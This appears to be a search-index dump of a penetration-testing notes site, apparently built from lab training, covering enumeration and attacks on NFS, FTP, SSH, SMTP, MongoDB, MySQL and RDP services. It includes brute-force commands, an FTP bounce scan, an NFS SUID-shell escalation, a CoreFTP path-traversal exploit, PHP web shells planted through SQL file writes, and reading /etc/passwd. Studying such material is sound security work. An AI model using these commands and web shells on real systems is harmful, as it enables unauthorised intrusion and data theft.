    sudo nmap $ip -p111,2049 -sV -sC\n\n# Also, run all NSE NFS scripts\nsudo nmap --script nfs* $ip -sV -p111,2049\n

    Once we have discovered such an NFS service, we can mount it on our local machine. For this, we can create a new empty folder to which the NFS share will be mounted. Once mounted, we can navigate it and view the contents just like our local system.

    # Show Available NFS Shares\nshowmount -e $ip\n\n# Mounting NFS Share\nmkdir target-NFS\nsudo mount -t nfs $ip:/ ./target-NFS/ -o nolock\ncd target-NFS\ntree .\n\n# List Contents with Usernames & Group Names\nls -l mnt/nfs/\n\n# List Contents with UIDs & GUIDs\nls -n mnt/nfs/\n\n# Unmount the share\nsudo umount ./target-NFS\n

    By default, the NFS server has root_squash enabled, which maps client access to nobody:nogroup. To bypass it, use sudo su to become root on the client.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#attacking-wrong-configured-nfs","title":"Attacking wrong configured NFS","text":"

    It is important to note that if the root_squash option is set, we cannot edit the backup.sh file even as root.

    We can also use NFS for further escalation. For example, if we have access to the system via SSH and want to read files from another folder that a specific user can read, we would need to upload a shell to the NFS share that has the SUID of that user and then run the shell via the SSH user.
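    A hedged sketch of that idea, assuming the export lets us write as root (e.g., no_root_squash) and we know the target user's UID/GID (placeholder values):

    # On our machine, inside the mounted share (paths and UID/GID are placeholders)\ncp /bin/bash ./target-NFS/tmp/shell\nsudo chown <uid>:<gid> ./target-NFS/tmp/shell\nsudo chmod u+s ./target-NFS/tmp/shell\n\n# On the target, via SSH: -p keeps the effective UID of the file owner\n/tmp/shell -p\n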

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"2049-nfs-network-file-system/#more","title":"More","text":"

    https://vk9-sec.com/2049-tcp-nfs-enumeration/.

    ","tags":["smb","port 2049","port 111","NFS","Network File System"]},{"location":"21-ftp/","title":"21 ftp","text":"

    The File Transfer Protocol (FTP) is a standard communication protocol used to transfer computer files from a server to a client on a computer network. FTP is built on a client\u2013server model architecture using separate control and data connections between the client and the server. The FTP runs within the application layer of the TCP/IP protocol stack. Thus, it is on the same layer as HTTP or POP.

    FTP users may authenticate themselves with a clear-text sign-in protocol, generally in the form of a username and password. However, they can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).
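    For comparison, an encrypted SFTP session (SSH-based) is a one-liner:

    sftp <username>@$ip\n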

    However, if the network administrators choose to wrap the connection with the SSL/TLS protocol or tunnel the FTP connection through SSH to add a layer of encryption that only the source and destination hosts can decrypt, this would successfully foil most Man-in-the-Middle attacks.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#how-it-works","title":"How it works","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#the-connection","title":"The connection","text":"

    1. First, the client and server establish a control channel through TCP port 21. The client sends commands to the server, and the server returns status codes.

    2. Then both communication participants can establish the data channel via TCP port 20. This channel is used exclusively for data transmission, and the protocol watches for errors during this process.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#active-and-passive-ftp","title":"Active and passive FTP","text":"

    A distinction is made between active and passive FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the passive mode has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation","title":"Installation","text":"

    You may need to install ftp service. Run:

    sudo apt install ftp -y\n

    Then to connect with ftp, run:

    ftp $ip \n

    The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage","title":"Basic usage","text":"
    # Connect with ftp\nftp $ip\n\n# If anonymous login is allowed, enter anonymous as user and press Enter when prompted for password\n\n# Give you a list of available commands\nhelp\n\n# List directories and files\nls\n\n# List recursively. Not always available, only in some configurations\nls -R\n\n# Change to a directory\ncd <folder>\n\n# Download a file to your localhost\nget <nameofFileInOrigin> <nameOfFileInLocalhost>\n\n# Upload a file from your localhost\nput <yourfile>\n\n# Exit connection\nquit\n\n# Connect in passive mode\nftp -p $ip\n# The `-p` flag in the `ftp` command on Linux is used to enable passive mode for the file transfer protocol (FTP) connection. Passive mode is a mode of FTP where the data connection is initiated by the client rather than the server. This can be useful when the client is behind a firewall or NAT (Network Address Translation) that does not allow incoming connections. \n

    More possibilities with wget:

    # Download all available files at once\nwget -m --no-passive ftp://anonymous:anonymous@$ip\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#footprinting-with-nmap","title":"Footprinting with nmap","text":"
    # Locate all ftp-related scripts\nfind / -type f -name \"ftp*\" 2>/dev/null | grep scripts\n\n# Run a general scan for version, in aggressive mode, and perform default scripts\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the STAT command, which displays information about the FTP server status.\n

    See more about nmap for scanning, running scripts and footprinting

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#attacking-ftp","title":"Attacking FTP","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#brute-forcing-with-medusa","title":"Brute forcing with Medusa","text":"

    Medusa Cheat sheet.

# Brute force FTP login\nmedusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp\n# -u: username\n# -U: list of Usernames\n# -p: password\n# -P: list of passwords\n# -h: host /IP\n# -M: protocol to bruteforce\n

However, Medusa is very slow in comparison to hydra:

    # Example for ftp in a non default port\nhydra -L users.txt -P pass.txt ftp://$ip:2121\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#ftp-bounce-attack","title":"FTP Bounce Attack","text":"

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targeting an FTP server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP bounce attack and obtain information about that server's open ports.

nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b: the nmap flag used to perform an FTP bounce attack\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#coreftp-server-build-725-directory-traversal-authenticated","title":"CoreFTP Server build 725 - Directory Traversal (Authenticated)","text":"

CVE-2022-22836 | exploit

    Summary: This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

The exploit for this attack is relatively straightforward, based on a single cURL command.

    curl -k -X PUT -H \"Host: <IP>\" --basic -u <username>:<password> --data-binary \"PoC.\" --path-as-is https://<IP>/../../../../../../whoops\n

We create a raw HTTP PUT request (-X PUT) with basic auth (--basic -u <username>:<password>), the path for the file (--path-as-is https://<IP>/../../../../../whoops), and its content (--data-binary \"PoC.\") with this command. Additionally, we specify the host header (-H \"Host: <IP>\") with the IP address of our target system.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#other-ftp-services","title":"Other FTP services","text":"","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#tftp","title":"TFTP","text":"

    Trivial File Transfer Protocol (TFTP) is simpler than FTP and performs file transfers between client and server processes.

• It does not provide user authentication or the other valuable features supported by FTP.
• It uses UDP instead of TCP.

    Because of the lack of security, TFTP, unlike FTP, may only be used in local and protected networks.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#basic-usage_1","title":"Basic usage","text":"
    # Sets the remote host, and optionally the port, for file transfers.\nconnect\n\n# Transfers a file or set of files from the remote host to the local host.\nget\n\n# Transfers a file or set of files from the local host onto the remote host\nput\n\n# Exits tftp\nquit\n\n# Shows the current status of tftp, including the current transfer mode (ascii or binary), connection status, time-out value, and so on\nstatus\n\n# Turns verbose mode, which displays additional information during file transfer, on or off.\nverbose \n\n# Unlike the FTP client, TFTP does not have directory listing functionality.\n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#vsftpd","title":"vsFTPd","text":"

    One of the most used FTP servers on Linux-based distributions is vsFTPd.

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#installation_1","title":"Installation","text":"
    sudo apt install vsftpd \n
    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"21-ftp/#configuration-file","title":"Configuration file","text":"

    The default configuration of vsFTPd can be found in /etc/vsftpd.conf.

• listen=NO : Run from inetd or as a standalone daemon?
• listen_ipv6=YES : Listen on IPv6?
• anonymous_enable=NO : Enable anonymous access?
• local_enable=YES : Allow local users to login?
• dirmessage_enable=YES : Display active directory messages when users go into certain directories?
• use_localtime=YES : Use local time?
• xferlog_enable=YES : Activate logging of uploads/downloads?
• connect_from_port_20=YES : Connect from port 20?
• secure_chroot_dir=/var/run/vsftpd/empty : Name of an empty directory
• pam_service_name=vsftpd : This string is the name of the PAM service vsftpd will use.
• rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem : Location of the RSA certificate to use for SSL encrypted connections.
• rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key : Location of the RSA private key.
• ssl_enable=NO : Enable SSL?

    In addition, there is a file called /etc/ftpusers that we also need to pay attention to, as this file is used to deny certain users access to the FTP service.
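
A quick way to review the active configuration and the denied users on a vsFTPd host is sketched below (assuming the default paths mentioned above):

# Show only active (non-comment) directives\ngrep -v \"^#\" /etc/vsftpd.conf\n\n# List users denied access to the FTP service\ncat /etc/ftpusers\n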

    ","tags":["ftp","port 21","port 20","tftp","vsFTPd"]},{"location":"22-ssh/","title":"22 ssh","text":"

    Secure Shell (SSH) enables two computers to establish an encrypted and direct connection within a possibly insecure network on the standard port TCP 22.

    Implemented natively on all Linux distributions and MacOS, SSH can also be used on Windows, with an appropriate program. The well-known OpenBSD SSH (OpenSSH) server on Linux distributions is an open-source fork of the original and commercial SSH server from SSH Communication Security.

    There are two competing protocols: SSH-1 and SSH-2. SSH-2, also known as SSH version 2, is a more advanced protocol than SSH version 1 in encryption, speed, stability, and security. For example, SSH-1 is vulnerable to MITM attacks, whereas SSH-2 is not.

    The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. This service uses three different cryptography operations/methods: symmetric encryption, asymmetric encryption, and hashing.

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#footprinting-ssh","title":"Footprinting ssh","text":"","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#ssh-audit","title":"ssh-audit","text":"
    # Installation and execution\ngit clone https://github.com/jtesta/ssh-audit.git \n\n# Execute\ncd ssh-audit\n./ssh-audit.py $ip\n
    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#nmap","title":"nmap","text":"

    Brute force script:

    nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n

OpenSSH 7.6p1 Ubuntu ubuntu0.3 is known to be affected by several public vulnerabilities, such as username enumeration (CVE-2018-15473).
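
To quickly check an identified version against public exploits, searchsploit (shipped with the exploitdb package) can be used; a minimal sketch:

searchsploit openssh 7.6\n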

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#connect-with-ssh","title":"Connect with ssh","text":"
    ssh <user>@$ip\n\n# connect with a ssh key\nssh -i id_rsa <user>@$ip\n
    ","tags":["pentesting","web pentesting","port 22"]},{"location":"22-ssh/#installing-a-ssh-service","title":"Installing a ssh service","text":"

    The sshd_config file, responsible for the OpenSSH server, has only a few of the settings configured by default. However, the default configuration includes X11 forwarding, which contained a command injection vulnerability in version 7.2p1 of OpenSSH in 2016.

    Configuration file: /etc/ssh/sshd_config.

    Common misconfigurations:

• PasswordAuthentication yes : Allows password-based authentication.
• PermitEmptyPasswords yes : Allows the use of empty passwords.
• PermitRootLogin yes : Allows logging in as the root user.
• Protocol 1 : Uses an outdated version of encryption.
• X11Forwarding yes : Allows X11 forwarding for GUI applications.
• AllowTcpForwarding yes : Allows forwarding of TCP ports.
• PermitTunnel : Allows tunneling.
• DebianBanner yes : Displays a specific banner when logging in.
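
A minimal sketch to spot these settings at a glance on a host we already have access to (assuming the default configuration path):

grep -Ei \"^(PasswordAuthentication|PermitEmptyPasswords|PermitRootLogin|Protocol|X11Forwarding|AllowTcpForwarding)\" /etc/ssh/sshd_config\n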

    Some instructions and hardening guides can be used to harden our SSH servers.

    ","tags":["pentesting","web pentesting","port 22"]},{"location":"23-telnet/","title":"23 telnet","text":"

    Sometimes, due to configuration mistakes, some important accounts can be left with blank passwords for the sake of accessibility. This is a significant issue with some network devices or hosts, leaving them open to simple brute-forcing attacks, where the attacker can try logging in sequentially, using a list of usernames with no password input. Some typical important accounts have self-explanatory names, such as:

    • admin
    • administrator
    • root

    A direct way to attempt logging in with these credentials in hopes that one of them exists and has a blank password is to input them manually in the terminal when the hosts request them. If the list were longer, we could use a script to automate this process, feeding it a wordlist for usernames and one for passwords.

    Typically, the wordlists used for this task consist of typical people names, abbreviations, or data from previous database leaks. For now, we can resort to manually trying these three main usernames above.
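
If manual attempts become tedious, a tool such as hydra can automate the null-password check; a minimal sketch, where users.txt is a hypothetical wordlist holding the usernames above:

hydra -L users.txt -e n telnet://$ip\n# -e n: additionally try an empty (null) password for every username\n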

    ","tags":["telnet","port 23"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/","title":"Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)","text":"

The Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails in an IP network. By default, SMTP servers accept connection requests on port 25. However, newer SMTP servers also use other ports such as TCP port 587. This port is used to receive mail from authenticated users/servers, usually using the STARTTLS command. SMTP works unencrypted without further measures and transmits all commands, data, and authentication information in plain text. To prevent unauthorized reading of data, SMTP is used in conjunction with SSL/TLS encryption. Under certain circumstances, a server uses a port other than the standard TCP port 25 for the encrypted connection, for example, TCP port 465.

    Mail User Agent (MUA): SMTP client who sends the email. MUA converts it into a header and a body and uploads both to the SMTP server.

    Mail Transfer Agent (MTA): The MTA checks the e-mail for size and spam and then stores it. At this point of the process, this MTA works as the sender's server. The MTA then searches the DNS for the IP address of the recipient mail server. On arrival at the destination SMTP server, the receiver's MTA reassembles the data packets to form a complete e-mail.

    Mail Submission Agent (MSA): Proxy that occasionally precedes the MTA to relieve the load. It checks the validity, i.e., the origin of the e-mail. This MSA is also called Relay server.

Mail Delivery Agent (MDA): It deals with transferring the email to the recipient's mailbox.

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#extended-smtp-esmtp","title":"Extended SMTP (ESMTP)","text":"

    Extended SMTP (ESMTP) deals with the main two shortcomings of SMTP protocol:

    • In SMTP, users are not authenticated, therefore the sender is unreliable.
    • SMTP doesn't have confirmations.

    For this, ESMTP uses TLS for encryption and AUTH PLAIN extension for authentication.
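
For reference, the AUTH PLAIN credential is the base64 encoding of the NUL-separated sequence \\0username\\0password. A minimal sketch to build the token on the attacker machine (alice/password123 are placeholders):

echo -ne '\\0alice\\0password123' | base64\n# Send the output to the server as: AUTH PLAIN <base64-token>\n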

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#basic-commands","title":"Basic commands","text":"
    # We can use telnet protocol to connect to a SMTP server\ntelnet $ip 25\n\n# AUTH is a service extension used to authenticate the client\nAUTH PLAIN  \n\n# The client logs in with its computer name and thus starts the session. It also lists all available commands\nEHLO\n    # Example: \n    # HELO mail1.inlanefreight.htb\n\n# The client names the email sender\nMAIL FROM   \n\n# The client names the email recipient\nRCPT TO\n\n# The client initiates the transmission of the email\nDATA \n\n# The client aborts the initiated transmission but keeps the connection between client and server\nRSET\n\n# The client checks if a mailbox is available for message transfer. This also means that this command could  be used to enumerate existing users on the system. However, this does not always work. Depending on how the SMTP server is configured, the SMTP server may issue `code 252` and confirm the existence of a user that does not exist on the system.\nVRFY\n# Example: VRFY root\n\n# The client also checks if a mailbox is available for messaging with this command \nEXPN\n\n# The client requests a response from the server to prevent disconnection due to time-out\nNOOP\n\n# The client terminates the session\nQUIT\n

If we are connected to a proxy and want it to connect to an SMTP server on our behalf, the command we would send would look something like this:

    CONNECT 10.129.14.128:25 HTTP/1.0\n

    Example:

telnet $ip 25  \n\n# Trying 10.129.14.128... \n# Connected to 10.129.14.128. \n# Escape character is '^]'. \n# 220 ESMTP Server   \n\nEHLO inlanefreight.htb  \n# 250-mail1.inlanefreight.htb \n# 250-PIPELINING \n# 250-SIZE 10240000 \n# 250-ETRN \n# 250-ENHANCEDSTATUSCODES \n# 250-8BITMIME \n# 250-DSN \n# 250-SMTPUTF8 \n# 250 CHUNKING   \n\nMAIL FROM: <cry0l1t3@inlanefreight.htb>  \n# 250 2.1.0 Ok   \n\nRCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure  \n# 250 2.1.5 Ok   \n\nDATA  \n# 354 End data with <CR><LF>.<CR><LF>  \n\n# From: <cry0l1t3@inlanefreight.htb> \n# To: <mrb3n@inlanefreight.htb> \n# Subject: DB \n# Date: Tue, 28 Sept 2021 16:32:51 +0200 \n\n`Hey man, I am trying to access our XY-DB but the creds dont work.  Did you make any changes there?.`  \n# 250 2.0.0 Ok: queued as 6E1CF1681AB   \n\nQUIT  \n# 221 2.0.0 Bye. Connection closed by foreign host.\n
A dangerous setting on the server side is an open relay configuration, which in Postfix looks like this:

mynetworks = 0.0.0.0/0\n

    With this setting, this SMTP server can send fake emails and thus initialize communication between multiple parties. Another attack possibility would be to spoof the email and read it.

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#footprinting-smtp","title":"Footprinting SMTP","text":"
    sudo nmap $ip -sC -sV -p25\n\nsudo nmap $ip -p25 --script smtp-open-relay -v\n

    Scripts for user enumeration:

    # Enumerate users:\nfor user in $(cat users.txt); do echo VRFY $user | nc -nv -w 6 $ip 25  ; done\n# -w: Include a delay in passing the argument. In seconds.\n

    Results from script in user enumeration:

    (UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 root\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <lala>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table\n(UNKNOWN) [10.129.16.141] 25 (smtp) open\n220 InFreight ESMTP v2.11\n252 2.0.0 robin                 \n
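
The same check can be automated with the smtp-user-enum tool; a minimal sketch, where users.txt is a hypothetical username wordlist:

smtp-user-enum -M VRFY -U users.txt -t $ip\n# -M: method to use (VRFY, EXPN or RCPT)\n# -U: list of usernames\n# -t: target server\n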
    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#postfix-an-example-of-a-smtp-server","title":"Postfix, an example of a SMTP server","text":"","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"25-565-587-simple-mail-tranfer-protocol-smtp/#configuration-file","title":"Configuration file","text":"

    See how to install postfix server.

The configuration file for the Postfix service is /etc/postfix/main.cf

    ","tags":["port 25","port 465","port 587","SMTP","Simple Mail Transfer Protocol"]},{"location":"27017-27018-mongodb/","title":"27017 - 27018 mongoDB","text":"

    https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb.

    More about mongo.

    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#description","title":"Description","text":"

• 27017 : The default port for mongod and mongos instances. You can change this port with port or --port.
• 27018 : The default port for mongod when running with the --shardsvr command-line option or the shardsvr value for the clusterRole setting in a configuration file.

MongoDB is an open-source database management system (DBMS) that uses a document-oriented database model which supports various forms of data.

    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

    More about mongo.

By default, MongoDB does not require a password. admin is a common default administrative database and user name in MongoDB.

    mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n
    ","tags":["mongodb","port 27017","port 27018"]},{"location":"27017-27018-mongodb/#some-mongodb-commands","title":"Some MongoDB commands","text":"

    More about mongo.

# Enter the mongodb shell\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# Dump the contents of the documents present in the flag collection; pretty() returns the output in a beautified format\ndb.flag.find().pretty()\n
    ","tags":["mongodb","port 27017","port 27018"]},{"location":"3128-squid/","title":"3128 Squid","text":"

    Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

    Squid is a widely used open-source proxy server and web cache daemon. It primarily operates as a proxy server, which means it acts as an intermediary between client devices (such as computers or smartphones) and web servers, facilitating requests and responses between them.

    Squid is commonly deployed in network environments to improve performance, enhance security, and manage internet access. Squid can cache frequently requested web content locally. When a client requests a web page or object that Squid has cached, it serves the content from its cache instead of fetching it from the original web server.

    Access Control: Squid provides robust access control mechanisms. Administrators can configure rules to control which clients are allowed to access specific websites or web services.

    Content Filtering: Squid can be used for content filtering and blocking access to specific websites or categories of websites (e.g., social media, adult content). This feature is often used by organizations to enforce acceptable use policies.

    ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3128-squid/#enumeration","title":"Enumeration","text":"
# Proxify curl through Squid\ncurl -x http://$ip:3128 http://$ip -H \"User-Agent: Firefox\"\n# -x / --proxy: use the specified proxy\n
    ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3306-mariadb-mysql/","title":"3306 mariaDB - mySQL","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#description","title":"Description","text":"

MySQL: MySQL is an open-source relational database management system (RDBMS) based on Structured Query Language (SQL). It is developed and managed by Oracle Corporation and was initially released on 23 May 1995. It is widely used in many small and large scale industrial applications and is capable of handling large volumes of data. After Oracle acquired MySQL, concerns arose about the database's future under Oracle, and hence MariaDB was developed.

MariaDB: MariaDB is an open-source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by the MariaDB Foundation and was initially released on 29 October 2009. MariaDB adds a significant number of new features, which makes it better in terms of performance and user-orientation than MySQL.

    sudo nmap $ip -sV -sC -p3306 --script mysql*\n
    sudo nmap -sS -sV --script mysql-empty-password -p 3306 $ip\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
# -h host/ip   \n# -u user. By default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mysql","title":"Connect to database: mysql","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-linux","title":"From Linux","text":"
# -h host/ip   \n# -u user. By default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\n\nmysql -u root -h <host/IP>\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-windows","title":"From windows","text":"
    mysql.exe -u username -pPassword123 -h $IP\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mariadb-commands","title":"mariadb commands","text":"
# Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n\n# Select column from table\nselect username,password from users;\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#upload-a-shell","title":"Upload a shell","text":"

Take a wordpress installation that uses a mysql database. If you manage to log in to the mysql panel (/phpmyadmin) as root, then you could upload a php shell to the /wp-content/uploads/ folder.

    Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-basic-commands","title":"mysql basic commands","text":"

    See mysql.

# Show databases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\nSHOW tables;\n\n# Dump content from a table\nSELECT * FROM NameOfTable;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE persona(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column attribute of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP COLUMN edad;\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n\n# Show all rows from table\nSELECT * FROM persona;\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#enumeration-queries","title":"Enumeration queries","text":"
    # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#command-execution","title":"Command execution","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#writing-files","title":"Writing files","text":"

MySQL supports User Defined Functions, which allow us to execute C/C++ code as a function within SQL; there's one User Defined Function for command execution in this GitHub repository.

MySQL does not have a stored procedure like xp_cmdshell, but we can achieve command execution if we write to a location in the file system that can execute our commands.

• If MySQL operates on a PHP-based web server (or one using another programming language like ASP.NET) and we have the appropriate privileges, we can attempt to write a file using SELECT INTO OUTFILE in the webserver directory.
    • Browse to the location where the file is and execute the commands.
     SELECT \"<?php echo shell_exec($_GET['c']);?>\" INTO OUTFILE '/var/www/html/webshell.php';\n
• In MySQL, a global system variable secure_file_priv limits the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function. These operations are permitted only to users who have the FILE privilege.
• Settings in the secure_file_priv variable:
  • If empty, the variable has no effect, which is not a secure setting, as we can read and write data using MySQL:

        show variables like \"secure_file_priv\";\n
    +------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       |\n+------------------+-------+\n
• If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
• If set to NULL, the server disables import and export operations.

# To write files using MSSQL (shown here for comparison), we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:\n\nsp_configure 'show advanced options', 1;\nRECONFIGURE;\nsp_configure 'Ole Automation Procedures', 1;\nRECONFIGURE;\n\n# Using MSSQL to Create a File\nDECLARE @OLE INT;\nDECLARE @FileID INT;\nEXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;\nEXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1;\nEXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET[\"c\"]);?>';\nEXECUTE sp_OADestroy @FileID;\nEXECUTE sp_OADestroy @OLE;\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#reading-files","title":"Reading files","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-read-local-files-in-mysql","title":"MySQL - Read Local Files in MySQL","text":"

    If permissions allows it:

    select LOAD_FILE(\"/etc/passwd\");\n
    ","tags":["mariadb","port 3306","mysql"]},{"location":"3389-rdp/","title":"3389 rdp","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#description","title":"Description","text":"

    source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp and HackTheBox Academy.

    Basic information about RDP service: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).

• port : 3389/TCP
• state : open
• service : ms-wbt-server
• version : Microsoft Terminal Services
• Banner : rdp-ntlm-info

